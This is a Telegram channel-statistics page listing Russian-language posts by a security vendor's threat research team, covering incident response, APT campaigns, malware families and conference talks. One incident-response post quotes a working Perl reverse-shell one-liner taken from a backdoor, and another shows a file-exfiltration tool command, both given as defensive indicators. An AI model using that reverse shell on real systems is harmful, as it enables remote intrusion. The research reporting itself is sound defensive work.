uz
Feedback
ESCalator

ESCalator

Kanalga Telegram’da o‘tish

Tips and tricks от команды экспертного центра безопасности Positive Technologies (PT ESC)

Ko'proq ko'rsatish
8 124
Obunachilar
+724 soatlar
+777 kun
+13130 kun
Obunachilarni jalb qilish
Sentabr '26
Sentabr '26
+182
5 kanalda
Avgust '26
+111
2 kanalda
Get PRO
Iyul '26
+337
11 kanalda
Get PRO
Iyun '26
+249
26 kanalda
Get PRO
May '26
+214
3 kanalda
Get PRO
Aprel '26
+261
6 kanalda
Get PRO
Mart '26
+289
6 kanalda
Get PRO
Fevral '26
+280
7 kanalda
Get PRO
Yanvar '26
+282
3 kanalda
Get PRO
Dekabr '25
+328
7 kanalda
Get PRO
Noyabr '25
+207
7 kanalda
Get PRO
Oktabr '25
+1 645
5 kanalda
Get PRO
Sentabr '25
+149
4 kanalda
Get PRO
Avgust '25
+235
4 kanalda
Get PRO
Iyul '25
+324
17 kanalda
Get PRO
Iyun '25
+222
6 kanalda
Get PRO
May '25
+345
9 kanalda
Get PRO
Aprel '25
+299
14 kanalda
Get PRO
Mart '25
+618
25 kanalda
Get PRO
Fevral '25
+248
10 kanalda
Get PRO
Yanvar '25
+444
10 kanalda
Get PRO
Dekabr '24
+234
4 kanalda
Get PRO
Noyabr '24
+666
9 kanalda
Get PRO
Oktabr '24
+416
8 kanalda
Get PRO
Sentabr '24
+282
5 kanalda
Get PRO
Avgust '24
+653
9 kanalda
Get PRO
Iyul '24
+1 144
3 kanalda
Sana
Obunachilarni jalb qilish
Esdaliklar
Kanallar
24 Sentabr+1
23 Sentabr+9
22 Sentabr+6
21 Sentabr+12
20 Sentabr+8
19 Sentabr+17
18 Sentabr+26
17 Sentabr+10
16 Sentabr+6
15 Sentabr+9
14 Sentabr+5
13 Sentabr+9
12 Sentabr+4
11 Sentabr+5
10 Sentabr+18
09 Sentabr+2
08 Sentabr+1
07 Sentabr+5
06 Sentabr+4
05 Sentabr+12
04 Sentabr+5
03 Sentabr+4
02 Sentabr+3
01 Sentabr+1
Kanal postlari
Восстановление EVTX-записей: методы карвинга 🧩 При расследовании инцидентов, когда злоумышленники шифруют образы виртуальных
Восстановление EVTX-записей: методы карвинга 🧩 При расследовании инцидентов, когда злоумышленники шифруют образы виртуальных машин, нередко возникает ситуация, при которой файловая система повреждается настолько, что штатное монтирование становится невозможным. Восстановить ее вручную теоретически можно, но это отнимает много времени и сопровождается потерями данных. В таких случаях применяется карвинг — побайтовый поиск сигнатур непосредственно в сыром образе, в обход файловой системы. ❗️ Команда PT ESC IR уделяет приоритетное внимание автоматизации разбора артефактов для последующего обнаружения вредоносной активности — это ускоряет восстановление картины инцидента. Наш пайплайн преимущественно реализован на Go, поэтому мы разработали собственную библиотеку на том же языке. Она разбирает готовые EVTX-файлы даже при несовпадении контрольных сумм или повреждении файла, а также выполняет карвинг событий из побитовых копий, дампов памяти и образов виртуальных дисков. О том, что поддается восстановлению и почему одни подходы дают полную структуру записи, а другие — лишь отдельные поля, читайте в нашем материале на Хабре 🫲 #ir #dfir #tip @ptescalator

2
Matn yo'q...
7 793
3
.exe .docm .xlsm Вредоносные файлы с этими расширениями чаще всего встречаются в сетевом трафике компаний. Давайте базово раз
.exe .docm .xlsm Вредоносные файлы с этими расширениями чаще всего встречаются в сетевом трафике компаний. Давайте базово разберемся, почему. 🖥 .exe — классическое расширение исполняемых файлов в Windows: двойной клик — и у вас запускается Fortnite (не осуждаем), браузер, ваш любимый мессенджер, установщик или любая другая программа. А может запуститься и Trojan или какой-нибудь другой вредонос. Чаще всего вы даже не видите, что у файла именно такое расширение: по умолчанию в Windows включена функция «Скрывать расширения для зарегистрированных типов файлов», из-за чего видно только первую часть имени. И этим пользуются злоумышленники. Например, они маскируют файл под что-нибудь безобидное: вместо zarplaty_sep_2026.pdf.exe вы увидите просто zarplaty_sep_2026.pdf. Подозрений не вызывает, а интерес пробуждает. Клац-клац — и бамц. В общем, для самозащиты рекомендуем отключить эту функцию. Делается просто, зато вы всегда будете знать, на что именно кликаете. 📄 .docm и .xlsm — а это знакомые всем офисным работягам расширения документов Microsoft Office. Их часто перекидывают по электронной почте, чатам и флешкам, так что обычно они не вызывают подозрений. Только что-то тут с последними буквами расширений не так — скажете вы, и будете правы. Вместо x в конце здесь стоит m, а это означает, что такие документы поддерживают макросы — небольшие программы на специальном языке VBA, которые могут выполнять действия внутри документа. Также могут попадаться расширения .dotm и .xltm — это шаблоны документов с поддержкой макросов. И так же, как с .exe, эти расширения по умолчанию скрыты в наименовании файлов в Windows, поэтому вы просто видите иконку документа и его название. Макросы — полезная штука, которая помогает автоматизировать рутинные действия в документах (с их помощью энтузиасты даже умудрились запустить DOOM прямо в Word). Но ими пользуются и злоумышленники: вы открываете вроде бы обычный файл, разрешаете макросы — и на вашем компьютере выполняются заложенные в них команды. Например, они могут запустить системную команду, которая загрузит и запустит другой вредонос. Так вот, к чему мы это решили объяснить 1️⃣ Внимательно следите за тем, что именно вы запускаете и какие разрешения даете. 2️⃣ Наши эксперты с помощью песочницы PT Sandbox проанализировали вредоносную активность, выявленную PT NAD в сетевом трафике организаций с октября 2025 года по июль 2026 года. И как раз 29% опасных файлов оказались с расширением .exe, а 26% — с расширениями Microsoft Office. 3️⃣ Как вы понимаете, эти файлы — только верхушка айсберга из вредоносов. Ниже в сетях были обнаружены и потенциально опасные инструменты, которые выглядят легитимно, различные вариации архивов и более интересные находки. О них — в полной версии исследования на нашем сайте. @ptescalator
2 138
4
TLP: POSITIVE RED №2 25 сентября проведем наш второй митап, на этот раз — в Музее криптографии (55.830677, 37.597678). Будут
TLP: POSITIVE RED №2 25 сентября проведем наш второй митап, на этот раз — в Музее криптографии (55.830677, 37.597678). Будут честные доклады без записи, живое общение и никакой воды (только пенное, снова). Если вы аналитик SOC, специалист по реагированию и расследованию инцидентов или эксперт по исследованию и детектированию угроз, то вам точно зайдет. Программа на вечер (встречаемся в 18:30): 🕖 19:00 — «От инфоповода до атаки: как группировки адаптируют глобальную и российскую повестку под свои операции». Денис Казаков, специалист группы киберразведки PT ESC. 🕢 19:30 — «VantaCore: как вымогатели собирают собственный арсенал». Александр Гантимуров, руководитель направления обратной разработки Angara MTDR. 🕣 20:30 — «История про шифровальщик, который не смог». Дмитрий Логинов, реверс-инженер, CICADA8. 🕘 21:00 — «Follow the __report, knock knock, Remedy». Иван Трофименко, аналитик центра мониторинга и реагирования JET CSIRT. 🕤 21:30 — обсудим томатный гозе и другие важные вопросы. Количество мест ограничено, регистрируйтесь заранее на нашем сайте. @ptescalator
9 167
5
Matn yo'q...
3 347
6
Matn yo'q...
3 308
7
Din, din — кто там? 🔔 Группа киберразведки экспертного центра безопасности Positive Technologies обнаружила новую группировк
Din, din — кто там? 🔔 Группа киберразведки экспертного центра безопасности Positive Technologies обнаружила новую группировку, которую мы назвали DENOmination Group. В 2026 году мы зафиксировали ее активность против российских организаций оборонно-промышленного, военного, финансового и консалтингового секторов. Ключевая особенность атак — использование легитимной среды выполнения Deno для запуска вредоносного JavaScript/TypeScript-кода. В исследованных цепочках мы наблюдали загрузчик DinDoor, агент удаленного доступа DenoRAT, вредоносные MSI- и LNK-файлы, ротацию C2-инфраструктуры и несколько связанных способов первоначальной доставки. Пересечения в кодовой базе, конфигурационных параметрах, логике построения цепочек и сетевой инфраструктуре позволили связать наблюдаемые эпизоды с активностью одной группировки. В исследовании разобрали архитектуру DinDoor и DenoRAT, механизмы закрепления и взаимодействия с C2, инфраструктурные пересечения, TTP и возможную модель использования общей платформы несколькими операторами. Подробности — в нашем блоге 🦖 #TI #APT #Malware @ptescalator
2 633
8
Он вам не gsocket 😑 В ходе расследования одного из инцидентов специалисты PT ESC IR наткнулись на весьма диковинный инструме
Он вам не gsocket 😑 В ходе расследования одного из инцидентов специалисты PT ESC IR наткнулись на весьма диковинный инструмент hsocket (не путать с gsocket). После получения первоначального доступа и установки веб-шелла злоумышленники доставили на скомпрометированный веб-сервер три bash-скрипта. 1️⃣ hsocket — бэкдор, имеющий следующий функционал: • запуск интерактивной командной оболочки • запуск эксплойтов для повышения привилегий в Linux-системах (PwnKit, Dirty Pipe, Dirty COW, Netfilter) • сканирование директории на наличие веб-шеллов и их удаление (вероятно, для очистки следов) • защита файлов от удаления • установление reverse shell-соединения с управляющим сервером с помощью кода на Perl: perl -e "use Socket;\$i=\"$hsHOST\";\$p=$hsPORT;socket(S,PF_INET,SOCK_STREAM, getprotobyname('tcp'));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){ open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('sh -i');};" • скачивание и запуск скриптов для поиска ошибок в конфигурации Linux и повышения привилегий (linenum, linpeas) 2️⃣ hfsm — файловый менеджер, который позволяет интерактивно работать с файловой системой: просматривать, редактировать и удалять файлы. 3️⃣ .hsrc — устанавливает полные права на чтение, запись и исполнение файлов hsocket и hfsm, а также создаёт алиасы для запуска данных скриптов. В рамках данного исследования нам удалось обнаружить статью, написанную на индонезийском языке, в которой было описано данное ВПО. Что интересно, веб-шелл, установленный на скомпрометированном сервере, также содержал комментарии и строки на индонезийском: // Fungsi untuk tampilan halaman login $Warning = "### ⚠️Info!! Terdekteksi Aktivitas Dari"; Сам веб-шелл является модифицированной версией Gecko. Об этом говорят комментарии и характерные строки кода: //------------------GECKO SHELL, RECODED BY AYANA--------------------// <!-- Gecko Folder File Manager --> IoC: hsocket.io /tmp/hs-data/ #ir #dfir #detect #ioc #malware @ptescalator
2 686
9
Matn yo'q...
3 242
10
We will croc you 👻 PhantomCore продолжает активно использовать ошибки в конфигурации 1С для атак на российские организации.
We will croc you 👻 PhantomCore продолжает активно использовать ошибки в конфигурации 1С для атак на российские организации. Об атаках на 1С с помощью 1cshell мы писали ранее (1, 2, 3). В рамках расследования инцидента команда PT ESC IR обнаружила компрометацию сервера 1С, работающего на операционной системе семейства Linux 🐧 Среди характерных признаков — наличие вредоносных исполняемых файлов в подкаталогах домашней директории служебного пользователя usr1cv8 и команд в .bash_history того же пользователя — в частности просмотр и удаление файла res.txt, в который записывается результат выполнения кода посредством 1cshell. /home/usr1cv8/.bash_history: cat res.txt /home/usr1cv8/.bash_history: rm res.txt После получения доступа в систему PhantomCore установили ReverseSSH-туннель, что является типичным поведением для данной группировки. 🕵️‍♂️ Помимо часто используемого инструментария, мы встретили и более диковинную утилиту croc, предназначенную для удаленной загрузки и эксфильтрации файлов. На исследуемом узле были обнаружены команды формата: CROC_SECRET=[REDACTED] ./croc С помощью нее злоумышленники могли загрузить на скомпрометированный узел файл, который был предварительно отправлен через веб-интерфейс https://getcroc.com/ (на скриншоте) или с другого компьютера, на котором установлен croc. 💡 Для поиска следов использования croc можно поискать исполняемый файл с соответствующим именем, а также использование переменной окружения CROC_SECRET. В качестве сетевого индикатора может служить домен getcroc.com. #ir #tip #apt #detect #dfir @ptescalator
3 547
11
Matn yo'q...
3 820
12
Matn yo'q...
4 887
13
Минус один пернатый вор — плюс сто очков рейтинга! 😵 Команда Threat Intelligence экспертного центра безопасности Positive Te
Минус один пернатый вор — плюс сто очков рейтинга! 😵 Команда Threat Intelligence экспертного центра безопасности Positive Technologies обнаружила кампанию восточноазиатской группировки FamousSparrow. Группировка использовала новый бэкдор, который мы назвали SquawkDoor, а также новую версию известного бэкдора SparrowDoor 🏴‍☠️ Группировка встраивала вредоносные JS-скрипты на сайты из разных стран. Они показывали пользователю якобы ошибку сертификата на определенном языке и предлагали скачать новый сертификат, который являлся MSI-файлом и приводил к заражению вредоносным бэкдором. 😳 Мы проанализировали бэкдоры: подробно показали новый SquawkDoor и провели детальный анализ отличий нового SparrowDoor от старой версии, а также связанных с ними HemiGate, TernDoor и CrowDoor. Помимо этого, мы нашли различные пересечения с другими злоумышленниками из Восточной Азии. Также в процессе анализа мы обнаружили связанного с группой пентестера, который готовил атаки. О том, какие приложения ранее взламывал злоумышленник и какие у него фетиши — читайте в нашем блоге 😏 #TI #APT #Malware @ptescalator
3 895
14
DragonDoll: матрешка в мире Android-шпионов 🪆 В начале этой весны специалисты PT ESC обнаружили неизвестный ранее APK-файл,
DragonDoll: матрешка в мире Android-шпионов 🪆 В начале этой весны специалисты PT ESC обнаружили неизвестный ранее APK-файл, загруженный из Саудовской Аравии. Сам образец содержал много приемов Defense Evasion. Для усложнения анализа было использовано: • 1 техника BadPack • 2 этапа загрузки нативных библиотек • 1 обфускация на основе LLVM • 6 проверок на выполнение в виртуальной среде • и несчитанное количество MBA-выражений После долгих страданий этапов анализа, с помощью сил эмуляции, законов булевой алгебры и нескольких сотен строк кода наши специалисты распаковали новый Android-шпион DragonDoll 📱 В ходе исследования мы наткнулись на масштабную атаку с участием данного ВПО, направленную на пользователей Android из более чем 26 стран, включая и Россию. Злоумышленники использовали GitHub как источник распространения и постоянного обновления DragonDoll. Ссылка на этот репозиторий привела на сеть поддельных сайтов с «обновлением» Chrome, содержание которых адаптировалось под язык жертвы. Разбор того, что лежало под слоем обфускации — в нашем блоге ⬅️ #TI #Android #Malware @ptescalator
3 927
15
Matn yo'q...
3 492
16
Едем на OFFZONE 2026 На этой неделе постов не было, зато на следующей — выступим с докладами на OFFZONE. Если будете, то захо
Едем на OFFZONE 2026 На этой неделе постов не было, зато на следующей — выступим с докладами на OFFZONE. Если будете, то заходите. А если не зайдете, то получите потом записи, но не все. ➡️ «Девиртуализация Warbird с помощью LLVM» / 20 августа, 14:00 Warbird — это внутренняя, официально недокументированная технология Microsoft для защиты кода и DRM. Мало кто знает, но Warbird также имеет виртуализацию, реализованную в нескольких компонентах ядра Windows: ci.dll, clipsp.sys и peauth.sys. На докладе Павел Максютин, ведущий специалист отдела экспертизы PT Sandbox, расскажет о современных подходах к девиртуализации, об устройстве виртуальной машины Warbird и как ему удалось ее сломать с помощью бинарной трансляции и LLVM. ➡️ Et tu, OpenCode: как злоумышленники атакуют агентов и выманивают ваши секреты / 20 августа, 16:10 Наступление эры агентских систем «подарило» злоумышленникам новые векторы атак на пользователей. Чего они добиваются и какие новые техники используют в отношении ассистентов и агентов, расскажет Станислав Раковский, руководитель группы Supply Chain Security. А еще будет практическая проверка того, насколько безопасно использовать ревью коммитов на основе опенсорсных и коммерческих LLM. ➡️ Дочирикались / 21 августа, 16:30 Название доклада отсылает к одной восточноазиатской группировке, которая атаковала цели в Южной Азии и Европе. Злоумышленники внедряли на взломанные легитимные сайты вредоносный JS, подменявший страницы фейковой установкой сертификата и загружавший ранее неизвестный бэкдор. Максим Шаманов и Александр Бадаев, специалисты TI-департамента PT ESC, расскажут о серьезных OPSEC-ошибках, которые допустили злоумышленники. Будут и другие доклады от ребят из Позитива — про них в этом посте 😠 @ptescalator
3 971
17
В международный день пенного самое время спросить…
4 226
18
⚡Фейковые новости — В С Ё Специалисты PT ESC обнаружили связанную между собой сеть новостных сайтов, почтовых доменов и аккау
⚡Фейковые новости — В С Ё Специалисты PT ESC обнаружили связанную между собой сеть новостных сайтов, почтовых доменов и аккаунтов в социальных сетях, которые использовались для распространения фейковых новостей. Подавляющее большинство обнаруженных новостных ресурсов и доменов для отправки писем были зарегистрированы на один и тот же email-адрес ✉️ Сайты и аккаунты в соцсетях в основном маскировались под региональные новостные площадки, а распространяемые через них фейковые материалы часто пересекались между разными ресурсами. Кроме того, мы обнаружили возможную связь этой инфраструктуры с группировкой Rare Werewolf. Ранее она также использовала похожую тактику на начальном этапе атак — рассылала письма без какой-либо полезной нагрузки. Подробнее о расследовании можно прочитать в нашем блоге 🗞 #TI #APT #FakeNews #Phishing @ptescalator
5 110
19
Matn yo'q...
4 696
20
Matn yo'q...
1